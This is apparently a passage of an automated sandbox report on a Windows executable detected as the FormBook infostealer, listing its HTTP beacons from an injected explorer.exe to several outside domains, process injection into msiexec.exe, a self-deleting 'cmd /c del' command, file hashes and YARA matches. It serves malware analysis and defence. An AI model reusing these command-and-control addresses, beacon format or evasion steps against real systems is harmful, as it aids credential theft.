                                                                    Date: Thu, 22 Jul 2021 08:09:41 GMT
                                                                    Server: Apache/2.4.18 (Ubuntu)
                                                                    Content-Length: 278
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.34973752.5.43.6180C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jul 22, 2021 10:09:46.745987892 CEST8986OUTGET /dy8g/?9rrLUp1=sC7FhjJqcCFIEoUuEobIBnrRYwOZzG9nc/x6jFk5Keq5TgsKgOpKFfaz6JoBJPzzv7cu&sxlxj=RL30W HTTP/1.1
                                                                    Host: www.cajunseafoodstcloud.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jul 22, 2021 10:09:46.909065962 CEST8987INHTTP/1.1 301 Moved Permanently
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Location: http://www.cajunseafoodstcloud.com/
                                                                    Server: Not GWS
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Content-Type-Options: nosniff
                                                                    Referrer-Policy: origin
                                                                    Access-Control-Allow-Origin: *
                                                                    Date: Thu, 22 Jul 2021 08:09:45 GMT
                                                                    Connection: close
                                                                    Content-Length: 158
                                                                    Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 61 6a 75 6e 73 65 61 66 6f 6f 64 73 74 63 6c 6f 75 64 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                    Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="http://www.cajunseafoodstcloud.com/">here</a></body>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.34973934.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jul 22, 2021 10:09:52.028851986 CEST8996OUTGET /dy8g/?9rrLUp1=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoFjnAjbDmWUu&sxlxj=RL30W HTTP/1.1
                                                                    Host: www.extinctionbrews.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jul 22, 2021 10:09:52.168380022 CEST8997INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Thu, 22 Jul 2021 08:09:52 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "60ef679d-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.34974150.87.238.18980C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jul 22, 2021 10:09:57.556418896 CEST9008OUTGET /dy8g/?9rrLUp1=iVPDfBhYBy5JvywJlu7/jTaNaIK/WCHUrbFXeojMH/nMVdHPbpxjQuq5aGN6jhO1pTuT&sxlxj=RL30W HTTP/1.1
                                                                    Host: www.tinsley.website
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jul 22, 2021 10:09:57.743305922 CEST9008INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 22 Jul 2021 08:09:57 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    5192.168.2.349742217.160.0.25480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jul 22, 2021 10:10:02.959182978 CEST9009OUTGET /dy8g/?9rrLUp1=XQ+IsuOG6xtA2RDWfBD5IRfVZekOdoA9gy19PVXp7eWYHk3qJ48ISdkxrcmrsJaPDNZD&sxlxj=RL30W HTTP/1.1
                                                                    Host: www.surivaganza.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jul 22, 2021 10:10:03.012269020 CEST9010INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Content-Length: 619
                                                                    Connection: close
                                                                    Date: Thu, 22 Jul 2021 08:10:03 GMT
                                                                    Server: Apache
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0d 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0d 0a 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0d 0a 20 20 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 09 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 20 20 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Error 404 - Not found</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="cache-control" content="no-cache" /> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;">Error 404 - Not found</h1><p style="font-size:0.8em;">Die angegebene Seite konnte nicht gefunden werden.</p> </body> </html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    6192.168.2.34974350.87.248.2080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jul 22, 2021 10:10:13.489747047 CEST9011OUTGET /dy8g/?9rrLUp1=dI9eO6GEnVuhhF2IZBGZI9CJMc/scmM0Fs5NmUifzPq1VUdHCmcaYQjC6cJJVTF2eMwa&sxlxj=RL30W HTTP/1.1
                                                                    Host: www.matcitekids.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jul 22, 2021 10:10:13.687524080 CEST9012INHTTP/1.1 500 Internal Server Error
                                                                    Date: Thu, 22 Jul 2021 08:10:13 GMT
                                                                    Server: Apache
                                                                    Content-Length: 677
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6d 61 74 63 69 74 65 6b 69 64 73 2e 6d 61 74 63 69 74 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@matcitekids.matcite.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Start time:10:08:21
                                                                    Start date:22/07/2021
                                                                    Path:C:\Users\user\Desktop\wREFu91LXZ.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\wREFu91LXZ.exe'
                                                                    Imagebase:0x400000
                                                                    File size:177125 bytes
                                                                    MD5 hash:686DC98567009E47EAC88E95804B9DDE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:10:08:22
                                                                    Start date:22/07/2021
                                                                    Path:C:\Users\user\Desktop\wREFu91LXZ.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\wREFu91LXZ.exe'
                                                                    Imagebase:0x400000
                                                                    File size:177125 bytes
                                                                    MD5 hash:686DC98567009E47EAC88E95804B9DDE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:10:08:27
                                                                    Start date:22/07/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff714890000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    General

                                                                    Start time:10:08:47
                                                                    Start date:22/07/2021
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                    Imagebase:0x80000
                                                                    File size:59904 bytes
                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    General

                                                                    Start time:10:08:52
                                                                    Start date:22/07/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\Desktop\wREFu91LXZ.exe'
                                                                    Imagebase:0xbd0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:10:08:53
                                                                    Start date:22/07/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff778f00000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >